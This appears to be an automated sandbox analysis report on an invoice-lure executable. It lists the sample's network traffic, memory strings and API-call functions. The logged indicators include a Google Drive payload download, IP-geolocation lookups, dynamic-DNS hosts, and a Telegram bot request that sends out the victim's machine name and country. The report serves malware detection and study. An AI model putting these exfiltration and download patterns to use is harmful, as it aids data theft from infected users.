HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 12:51:14 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Factura Honorarios 2024-11-17.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003610D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036107000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/4
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/d
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005963000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663661029.00000000073F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2193651298.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=downloadD
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003613E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040542B

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		3_2_00403359

Creates files inside the system directory

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

File created: C:\Windows\resources\0809

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_00404C68	0_2_00404C68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_0040698E	0_2_0040698E
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 0_2_6FF41B63	0_2_6FF41B63
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00404C68	3_2_00404C68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0040698E	3_2_0040698E
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015C19B	3_2_0015C19B
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015D278	3_2_0015D278
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00155362	3_2_00155362
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015C468	3_2_0015C468
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015C738	3_2_0015C738
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015E988	3_2_0015E988
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_001569A0	3_2_001569A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_001529E0	3_2_001529E0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015CA08	3_2_0015CA08
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015CCD8	3_2_0015CCD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00159DE0	3_2_00159DE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015CFAC	3_2_0015CFAC
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00156FC8	3_2_00156FC8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015F974	3_2_0015F974
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_0015E97C	3_2_0015E97C
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_00153E09	3_2_00153E09
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8FC68	3_2_38F8FC68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F85028	3_2_38F85028
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F82968	3_2_38F82968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F81E80	3_2_38F81E80
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E258	3_2_38F8E258
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F817A0	3_2_38F817A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F89328	3_2_38F89328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D0F8	3_2_38F8D0F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8CCA0	3_2_38F8CCA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8CC8F	3_2_38F8CC8F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80040	3_2_38F80040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F85020	3_2_38F85020
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F89C18	3_2_38F89C18
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80019	3_2_38F80019
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8F810	3_2_38F8F810
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8DDF1	3_2_38F8DDF1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D9A8	3_2_38F8D9A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D999	3_2_38F8D999
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8D550	3_2_38F8D550
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F89548	3_2_38F89548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E6B0	3_2_38F8E6B0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E6A0	3_2_38F8E6A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F81E70	3_2_38F81E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E257	3_2_38F8E257
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8E24D	3_2_38F8E24D
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8DE00	3_2_38F8DE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8F3B8	3_2_38F8F3B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F88BA0	3_2_38F88BA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F88B91	3_2_38F88B91
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8178F	3_2_38F8178F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8EF60	3_2_38F8EF60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80B30	3_2_38F80B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F80B20	3_2_38F80B20
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_38F8EB08	3_2_38F8EB08
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391781D0	3_2_391781D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391738B8	3_2_391738B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39177720	3_2_39177720
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39177B78	3_2_39177B78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39178FB0	3_2_39178FB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917A938	3_2_3917A938
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E538	3_2_3917E538
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917A928	3_2_3917A928
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C558	3_2_3917C558
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E548	3_2_3917E548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39170D48	3_2_39170D48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C548	3_2_3917C548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39171190	3_2_39171190
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917119F	3_2_3917119F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391711A0	3_2_391711A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E9D8	3_2_3917E9D8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C9D8	3_2_3917C9D8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E9C8	3_2_3917E9C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391715F7	3_2_391715F7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391715F8	3_2_391715F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C9E8	3_2_3917C9E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391715E8	3_2_391715E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917DC19	3_2_3917DC19
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917FC18	3_2_3917FC18
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39176030	3_2_39176030
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917BC38	3_2_3917BC38
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917BC2A	3_2_3917BC2A
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917DC28	3_2_3917DC28
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39173450	3_2_39173450
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917345F	3_2_3917345F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39170040	3_2_39170040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39173460	3_2_39173460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39170498	3_2_39170498
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39176488	3_2_39176488
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C0B7	3_2_3917C0B7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E0B8	3_2_3917E0B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917E0A7	3_2_3917E0A7
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917C0C8	3_2_3917C0C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_391708F0	3_2_391708F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917B318	3_2_3917B318
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917B307	3_2_3917B307
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39172300	3_2_39172300
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_3917D308	3_2_3917D308
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39177722	3_2_39177722
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Code function: 3_2_39175328	3_2_39175328
